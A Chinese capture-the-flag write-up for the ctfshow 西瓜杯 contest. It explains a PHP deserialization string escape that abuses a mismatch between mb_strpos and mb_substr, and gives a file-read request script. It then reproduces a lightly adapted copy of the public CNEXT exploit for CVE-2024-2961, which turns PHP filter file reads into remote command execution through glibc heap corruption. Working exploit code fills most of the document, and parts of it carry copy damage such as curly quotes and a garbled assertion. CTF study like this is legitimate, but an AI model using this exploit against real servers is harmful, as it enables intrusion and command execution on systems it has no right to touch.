ctfshow西瓜杯wp
暑假还是有点犯懒了,哎意料之中,上周ctfshow西瓜杯的题目我看了一些,感觉还是很有价值的所有复现一下。
CodeInject
简单闭合一下前面的就可以命令执行了
\
easy_polluted
和ciscn线下的python污染就不多说了
Ezzz_php
这题做道了一半但是因为我是最后一天下午才打的这个比赛导致我最后虽然查道了如何将file_get_contents升级为命令执行的文章但是还是没有写出来
反序列链
1 |
|
首先审计源码我们可以发现其存在反序列入口,但是反序列的$ctf
通过substrstr这个函数处理导致其反序列的内容于前面拼接的read
无关这是很矛盾的,所有我们查看一下这个substrstr函数1
2
3
4
5
6function substrstr($data)
{
$start = mb_strpos($data, "[");
$end = mb_strpos($data, "]");
return mb_substr($data, $start + 1, $end - 1 - $start);
}
可以发现其是使用mb_strpos和mb_substr这两个函数我们先了解一下这个两个函数
php的内置函数像上strlen substr这样的字符处理函数其是会因为不同的编码而返回不同的值的,这是因为其处理字符是在字节层次进行的,而如果我们要使得汉字在不同的编码下处理的结果不会出现差异从而导致各种各样的问题,我们就需要使用mbstring这个扩展了。
但是其mb_strpos和mb_substr在处理像\xF0 \x9f
这种utf-8的字符会存在一些差异这也就导致了,字符串逃逸的风险
像题目中的substrstr函数其就使用了mb_strpos和mb_substr来截取[]
内的字符。
我们先来说一下其在处时存在什么样的差异
这个我是看来p牛的文章才知道的。如下例子1
2
3
4
5
6
7
8
9
10
11
12
function substrstr($data)
{
$start = mb_strpos($data, "[");
echo $start."\n";
$end = mb_strpos($data, "]");
echo $end."\n";
return mb_substr($data, $start + 1, $end - 1 - $start);
}
$read="\xF0\x9F[aaa123]";
$data=substrstr($read);
echo $data;
其输出为1
2
31
8
a123]
我们可以看到虽然我们输出的$start
和$end
为1和8但是其并没有将键值为2到7的内容输出,这就是因为mb_subpos和mb_substr这两个函数的在处理含有utf-8字符时的区别
根据如上的结果我们可以发现,mb_strpos在处理\xF0\x9F[
这种utf-8后跟着正常字符时会直接截断将已经解析的\xF0\x9F
解析为一个字符。
我们都知道utf-8的一个字符是有四个字节的16进制字符组成的,而mb_substr其在处理字符时为\xF0\x9F
是如果后面跟着非utf-8编码的字符是就和将后两个字节合并到前面的\xF0\x9F
使其与正常的utf-8是同一大学而后在正常解析。这导致了mb_strpos会将\xF0\x9F[a
解析为三个字符而mb_substr会将其解析为一个字符这也就导致了其字符会减少两个。这也就会导致字符串的逃逸。
经过尝试我们发现了只要不断增加\xF0\x9F
的数量即可逃逸,每个\xF0\x9F\xF0\x9F
会被mb_strpos解析为两个字符而\xF0\x9F\xF0\x9F
只会被mb_substr解析为一个字符这会导致字符串减少的字符串逃逸。
结果尝试发现mb_strpos会直接忽略\x9f
但是mb_substr会将其解析为一个字符。
一
我们解析链的构造方法首先我们肯定是要构造任意文件读取了。但是我们查看代码会发现其可控的只有read和$_GET['start']
即$start
我们想要反序列话的链子应该如下O:9:"read_file":2:{s:5:"start";s:9:"gxngxngxn";s:8:"filename";s:5:"/flag";}
,我们需要使用上面提到的宽字符逃逸的方法来将我们构造的链子逃逸出去。我们将链子直接赋值给start得到的$ctf
为O:9:"read_file":2:{s:5:"start";s:75:"O:9:"read_file":2:{s:5:"start";s:9:"gxngxngxn";s:8:"filename";s:5:"/flag";}";s:8:"filename";s:5:"/flag";}
更加我们上面提到的每增加一个\xF0\x9F\xF0\x9F
后续字符在经过处理后就会被吞掉一个字符。那么我们只要在[
前面加上37个\xF0\x9F\xF0\x9F
就可使得$ctf
变为O:9:"read_file":2:{s:5:"start";s:9:"gxngxngxn";s:8:"filename";s:5:"/flag";}";s:8:"filename";s:5:"/flag";}]
即我们将链子逃逸了出去。
所以只要给read传37个\xF0\x9F\xF0\x9F
即可逃逸成功。
二
通过%9f也可以来构造链子
同样我们要构造O:9:"read_file":2:{s:5:"start";s:9:"gxngxngxn";s:8:"filename";s:5:"/flag";}
其但是由于%9f会使得截取范围算是前移。即如下1
2
3
4
5
6
7
8
9
10
11
12
function substrstr($data)
{
$start = mb_strpos($data, "[");
echo $start."\n";
$end = mb_strpos($data, "]");
echo $end."\n";
return mb_substr($data, $start + 1, $end - 1 - $start);
}
$read="\x9f\x9f\x9f\x9f\x9f1111[aaaa]";
$data=substrstr($read);
echo $data;
输出1
2
34
9
1111
假设1111为我们要使用的payload,那么我们可以发现只要将截取的内容前移payload长度+1个字符就可以成功逃逸,二括号内的内容长度要大于payload的长度。
即我们可以构造如下脚本1
2
3
4
5
6
7
8
9import requests
path="/etc/hosts"
payload_file='O:9:"read_file":2:{s:5:"start";s:9:"gxngxngxn";s:8:"filename";s:'+str(len(path))+':"'+path+'";}'
payload='%9f'*(len(payload_file)+1)+payload_file.replace("+","%2b")
start="a"*(len(payload_file)+11)
url="https://d34019c5-7d46-48e6-bed4-de3459da6865.challenge.ctf.show/"+f"?start={start}&read={payload}"
req=requests.get(url)
print(req.text
但是虽然可以文件读取但是并不知道文件的名字为什么。所以我们需要rce
CVE-2024-2961:将phpfilter任意文件读取提升为远程代码执行
参考:
https://xz.aliyun.com/t/14690
原作者给出的exp:
https://github.com/ambionics/cnext-exploits/blob/main/cnext-exploit.py
因为这个是利用了glibc的我不懂应该是属于pwn的范围的所以我就当个脚本小子即可
虽然有exp但是我们还需要进行小小的修改如下1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44#!/usr/bin/env python3
#
# CNEXT: PHP file-read to RCE
# Date: 2024-05-27
# Author: Charles FOL @cfreal_ (LEXFO/AMBIONICS)
#
# TODO Parse LIBC to know if patched
#
# INFORMATIONS
#
# To use, implement the Remote class, which tells the exploit how to send the payload.
#
# REQUIREMENTS
#
# Requires ten: https://github.com/cfreal/ten
#
from __future__ import annotations
import base64
import zlib
from dataclasses import dataclass
from pwn import *
from requests.exceptions import ChunkedEncodingError, ConnectionError
from ten import *
HEAP_SIZE = 2 * 1024 * 1024
BUG = "劄".encode("utf-8")
class Remote:
"""A helper class to send the payload and download files.
The logic of the exploit is always the same, but the exploit needs to know how to
download files (/proc/self/maps and libc) and how to send the payload.
The code here serves as an example that attacks a page that looks like:
```php
<?php
$data = file_get_contents($_POST['file']);
echo "File contents: $data";
Tweak it to fit your target, and start the exploit.
"""
def __init__(self, url: str) -> None:
self.url = url
self.session = Session()
def send(self, path: str) -> Response:
"""Sends given `path` to the HTTP server. Returns the response.
"""
payload_file = 'O:9:"read_file":2:{s:5:"start";s:9:"gxngxngxn";s:8:"filename";s:' + str(len(path)) + ':"' + path + '";}'
payload = "%9f" * (len(payload_file) + 1) + payload_file.replace("+","%2b")
filename_len = "a" * (len(path) + 10)
url = self.url+f"?start={filename_len}&read={payload}"
return self.session.get(url)
def download(self, path: str) -> bytes:
"""Returns the contents of a remote file.
"""
path = f"php://filter/convert.base64-encode/resource={path}"
response = self.send(path)
data = response.re.search(b"What you are reading is:(.*)", flags=re.S).group(1)
return base64.decode(data)
@entry
@arg(“url”, “Target URL”)
@arg(“command”, “Command to run on the system; limited to 0x140 bytes”)
@arg(“sleep_time”, “Time to sleep to assert that the exploit worked. By default, 1.”)
@arg(“heap”, “Address of the main zend_mm_heap structure.”)
@arg(
“pad”,
“Number of 0x100 chunks to pad with. If the website makes a lot of heap “
“operations with this size, increase this. Defaults to 20.”,
)
@dataclass
class Exploit:
“””CNEXT exploit: RCE using a file read primitive in PHP.”””
url: str
command: str
sleep: int = 1
heap: str = None
pad: int = 20
def __post_init__(self):
self.remote = Remote(self.url)
self.log = logger("EXPLOIT")
self.info = {}
self.heap = self.heap and int(self.heap, 16)
def check_vulnerable(self) -> None:
"""Checks whether the target is reachable and properly allows for the various
wrappers and filters that the exploit needs.
"""
def safe_download(path: str) -> bytes:
try:
return self.remote.download(path)
except ConnectionError:
failure("Target not [b]reachable[/] ?")
def check_token(text: str, path: str) -> bool:
result = safe_download(path)
return text.encode() == result
text = tf.random.string(50).encode()
base64 = b64(text, misalign=True).decode()
path = f"data:text/plain;base64,{base64}"
result = safe_download(path)
if text not in result:
msg_failure("Remote.download did not return the test string")
print("--------------------")
print(f"Expected test string: {text}")
print(f"Got: {result}")
print("--------------------")
failure("If your code works fine, it means that the [i]data://[/] wrapper does not work")
msg_info("The [i]data://[/] wrapper works")
text = tf.random.string(50)
base64 = b64(text.encode(), misalign=True).decode()
path = f"php://filter//resource=data:text/plain;base64,{base64}"
if not check_token(text, path):
failure("The [i]php://filter/[/] wrapper does not work")
msg_info("The [i]php://filter/[/] wrapper works")
text = tf.random.string(50)
base64 = b64(compress(text.encode()), misalign=True).decode()
path = f"php://filter/zlib.inflate/resource=data:text/plain;base64,{base64}"
if not check_token(text, path):
failure("The [i]zlib[/] extension is not enabled")
msg_info("The [i]zlib[/] extension is enabled")
msg_success("Exploit preconditions are satisfied")
def get_file(self, path: str) -> bytes:
with msg_status(f"Downloading [i]{path}[/]..."):
return self.remote.download(path)
def get_regions(self) -> list[Region]:
"""Obtains the memory regions of the PHP process by querying /proc/self/maps."""
maps = self.get_file("/proc/self/maps")
maps = maps.decode()
PATTERN = re.compile(
r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)"
)
regions = []
for region in table.split(maps, strip=True):
if match := PATTERN.match(region):
start = int(match.group(1), 16)
stop = int(match.group(2), 16)
permissions = match.group(3)
path = match.group(4)
if "/" in path or "[" in path:
path = path.rsplit(" ", 1)[-1]
else:
path = ""
current = Region(start, stop, permissions, path)
regions.append(current)
else:
print(maps)
failure("Unable to parse memory mappings")
self.log.info(f"Got {len(regions)} memory regions")
return regions
def get_symbols_and_addresses(self) -> None:
"""Obtains useful symbols and addresses from the file read primitive."""
regions = self.get_regions()
LIBC_FILE = "/dev/shm/cnext-libc"
# PHP's heap
self.info["heap"] = self.heap or self.find_main_heap(regions)
# Libc
libc = self._get_region(regions, "libc-", "libc.so")
self.download_file(libc.path, LIBC_FILE)
self.info["libc"] = ELF(LIBC_FILE, checksec=False)
self.info["libc"].address = libc.start
def _get_region(self, regions: list[Region], *names: str) -> Region:
"""Returns the first region whose name matches one of the given names."""
for region in regions:
if any(name in region.path for name in names):
break
else:
failure("Unable to locate region")
return region
def download_file(self, remote_path: str, local_path: str) -> None:
"""Downloads `remote_path` to `local_path`"""
data = self.get_file(remote_path)
Path(local_path).write(data)
def find_main_heap(self, regions: list[Region]) -> Region:
# Any anonymous RW region with a size superior to the base heap size is a
# candidate. The heap is at the bottom of the region.
heaps = [
region.stop - HEAP_SIZE + 0x40
for region in reversed(regions)
if region.permissions == "rw-p"
and region.size >= HEAP_SIZE
and region.stop & (HEAP_SIZE - 1) == 0
and region.path == ""
]
if not heaps:
failure("Unable to find PHP's main heap in memory")
first = heaps[0]
if len(heaps) > 1:
heaps = ", ".join(map(hex, heaps))
msg_info(f"Potential heaps: [i]{heaps}[/] (using first)")
else:
msg_info(f"Using [i]{hex(first)}[/] as heap")
return first
def run(self) -> None:
self.check_vulnerable()
self.get_symbols_and_addresses()
self.exploit()
def build_exploit_path(self) -> str:
"""
On each step of the exploit, a filter will process each chunk one after the
other. Processing generally involves making some kind of operation either
on the chunk or in a destination chunk of the same size. Each operation is
applied on every single chunk; you cannot make PHP apply iconv on the first 10
chunks and leave the rest in place. That's where the difficulties come from.
Keep in mind that we know the address of the main heap, and the libraries.
ASLR/PIE do not matter here.
The idea is to use the bug to make the freelist for chunks of size 0x100 point
lower. For instance, we have the following free list:
... -> 0x7fffAABBCC900 -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB00
By triggering the bug from chunk ..900, we get:
... -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB48 -> ???
That's step 3.
Now, in order to control the free list, and make it point whereever we want,
we need to have previously put a pointer at address 0x7fffAABBCCB48. To do so,
we'd have to have allocated 0x7fffAABBCCB00 and set our pointer at offset 0x48.
That's step 2.
Now, if we were to perform step2 an then step3 without anything else, we'd have
a problem: after step2 has been processed, the free list goes bottom-up, like:
0x7fffAABBCCB00 -> 0x7fffAABBCCA00 -> 0x7fffAABBCC900
We need to go the other way around. That's why we have step 1: it just allocates
chunks. When they get freed, they reverse the free list. Now step2 allocates in
reverse order, and therefore after step2, chunks are in the correct order.
Another problem comes up.
To trigger the overflow in step3, we convert from UTF-8 to ISO-2022-CN-EXT.
Since step2 creates chunks that contain pointers and pointers are generally not
UTF-8, we cannot afford to have that conversion happen on the chunks of step2.
To avoid this, we put the chunks in step2 at the very end of the chain, and
prefix them with `0\n`. When dechunked (right before the iconv), they will
"disappear" from the chain, preserving them from the character set conversion
and saving us from an unwanted processing error that would stop the processing
chain.
After step3 we have a corrupted freelist with an arbitrary pointer into it. We
don't know the precise layout of the heap, but we know that at the top of the
heap resides a zend_mm_heap structure. We overwrite this structure in two ways.
Its free_slot[] array contains a pointer to each free list. By overwriting it,
we can make PHP allocate chunks whereever we want. In addition, its custom_heap
field contains pointers to hook functions for emalloc, efree, and erealloc
(similarly to malloc_hook, free_hook, etc. in the libc). We overwrite them and
then overwrite the use_custom_heap flag to make PHP use these function pointers
instead. We can now do our favorite CTF technique and get a call to
system(<chunk>).
We make sure that the "system" command kills the current process to avoid other
system() calls with random chunk data, leading to undefined behaviour.
The pad blocks just "pad" our allocations so that even if the heap of the
process is in a random state, we still get contiguous, in order chunks for our
exploit.
Therefore, the whole process described here CANNOT crash. Everything falls
perfectly in place, and nothing can get in the middle of our allocations.
"""
LIBC = self.info["libc"]
ADDR_EMALLOC = LIBC.symbols["__libc_malloc"]
ADDR_EFREE = LIBC.symbols["__libc_system"]
ADDR_EREALLOC = LIBC.symbols["__libc_realloc"]
ADDR_HEAP = self.info["heap"]
ADDR_FREE_SLOT = ADDR_HEAP + 0x20
ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168
ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10
CS = 0x100
# Pad needs to stay at size 0x100 at every step
pad_size = CS - 0x18
pad = b"\x00" * pad_size
pad = chunked_chunk(pad, len(pad) + 6)
pad = chunked_chunk(pad, len(pad) + 6)
pad = chunked_chunk(pad, len(pad) + 6)
pad = compressed_bucket(pad)
step1_size = 1
step1 = b"\x00" * step1_size
step1 = chunked_chunk(step1)
step1 = chunked_chunk(step1)
step1 = chunked_chunk(step1, CS)
step1 = compressed_bucket(step1)
# Since these chunks contain non-UTF-8 chars, we cannot let it get converted to
# ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last dechunk "crash"
step2_size = 0x48
step2 = b"\x00" * (step2_size + 8)
step2 = chunked_chunk(step2, CS)
step2 = chunked_chunk(step2)
step2 = compressed_bucket(step2)
step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)
step2_write_ptr = chunked_chunk(step2_write_ptr, CS)
step2_write_ptr = chunked_chunk(step2_write_ptr)
step2_write_ptr = compressed_bucket(step2_write_ptr)
step3_size = CS
step3 = b"\x00" * step3_size
assert len(step3) == CS
step3 = chunked_chunk(step3)
step3 = chunked_chunk(step3)
step3 = chunked_chunk(step3)
step3 = compressed_bucket(step3)
step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG
assert len(step3_overflow) == CS
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = compressed_bucket(step3_overflow)
step4_size = CS
step4 = b"=00" + b"\x00" * (step4_size - 1)
step4 = chunked_chunk(step4)
step4 = chunked_chunk(step4)
step4 = chunked_chunk(step4)
step4 = compressed_bucket(step4)
# This chunk will eventually overwrite mm_heap->free_slot
# it is actually allocated 0x10 bytes BEFORE it, thus the two filler values
step4_pwn = ptr_bucket(
0x200000,
0,
# free_slot
0,
0,
ADDR_CUSTOM_HEAP, # 0x18
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
ADDR_HEAP, # 0x140
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
size=CS,
)
step4_custom_heap = ptr_bucket(
ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18
)
step4_use_custom_heap_size = 0x140
COMMAND = self.command
COMMAND = f"kill -9 $PPID; {COMMAND}"
if self.sleep:
COMMAND = f"sleep {self.sleep}; {COMMAND}"
COMMAND = COMMAND.encode() + b"\x00"
assert (
len(COMMAND) <= step4_use_custom_heap_size
), f"Command too big ({len(COMMAND)}), it must be strictly inferior to {hex(step4_use_custom_heap_size)}"
COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")
step4_use_custom_heap = COMMAND
step4_use_custom_heap = qpe(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)
pages = (
step4 * 3
+ step4_pwn
+ step4_custom_heap
+ step4_use_custom_heap
+ step3_overflow
+ pad * self.pad
+ step1 * 3
+ step2_write_ptr
+ step2 * 2
)
resource = compress(compress(pages))
resource = b64(resource)
resource = f"data:text/plain;base64,{resource.decode()}"
filters = [
# Create buckets
"zlib.inflate",
"zlib.inflate",
# Step 0: Setup heap
"dechunk",
"convert.iconv.latin1.latin1",
# Step 1: Reverse FL order
"dechunk",
"convert.iconv.latin1.latin1",
# Step 2: Put fake pointer and make FL order back to normal
"dechunk",
"convert.iconv.latin1.latin1",
# Step 3: Trigger overflow
"dechunk",
"convert.iconv.UTF-8.ISO-2022-CN-EXT",
# Step 4: Allocate at arbitrary address and change zend_mm_heap
"convert.quoted-printable-decode",
"convert.iconv.latin1.latin1",
]
filters = "|".join(filters)
path = f"php://filter/read={filters}/resource={resource}"
return path
@inform("Triggering...")
def exploit(self) -> None:
path = self.build_exploit_path()
start = time.time()
try:
self.remote.send(path)
except (ConnectionError, ChunkedEncodingError):
pass
msg_print()
if not self.sleep:
msg_print(" [b white on black] EXPLOIT [/][b white on green] SUCCESS [/] [i](probably)[/]")
elif start + self.sleep <= time.time():
msg_print(" [b white on black] EXPLOIT [/][b white on green] SUCCESS [/]")
else:
# Wrong heap, maybe? If the exploited suggested others, use them!
msg_print(" [b white on black] EXPLOIT [/][b white on red] FAILURE [/]")
msg_print()
def compress(data) -> bytes:
“””Returns data suitable for zlib.inflate
.
“””
# Remove 2-byte header and 4-byte checksum
return zlib.compress(data, 9)[2:-4]
def b64(data: bytes, misalign=True) -> bytes:
payload = base64.encode(data)
if not misalign and payload.endswith(“=”):
raise ValueError(f”Misaligned: {data}”)
return payload.encode()
def compressed_bucket(data: bytes) -> bytes:
“””Returns a chunk of size 0x8000 that, when dechunked, returns the data.”””
return chunked_chunk(data, 0x8000)
def qpe(data: bytes) -> bytes:
“””Emulates quoted-printable-encode.
“””
return “”.join(f”={x:02x}” for x in data).upper().encode()
def ptr_bucket(ptrs, size=None) -> bytes:
“””Creates a 0x8000 chunk that reveals pointers after every step has been ran.”””
if size is not None:
assert len(ptrs) 8 == size
bucket = b””.join(map(p64, ptrs))
bucket = qpe(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = compressed_bucket(bucket)
return bucket
def chunked_chunk(data: bytes, size: int = None) -> bytes:
“””Constructs a chunked representation of the given chunk. If size is given, the
chunked representation has size size
.
For instance, ABCD
with size 10 becomes: 0004\nABCD\n
.
“””
# The caller does not care about the size: let's just add 8, which is more than
# enough
if size is None:
size = len(data) + 8
keep = len(data) + len(b"\n\n")
size = f"{len(data):x}".rjust(size - keep, "0")
return size.encode() + b"\n" + data + b"\n"
@dataclass
class Region:
“””A memory region.”””
start: int
stop: int
permissions: str
path: str
@property
def size(self) -> int:
return self.stop - self.start
Exploit()
```
#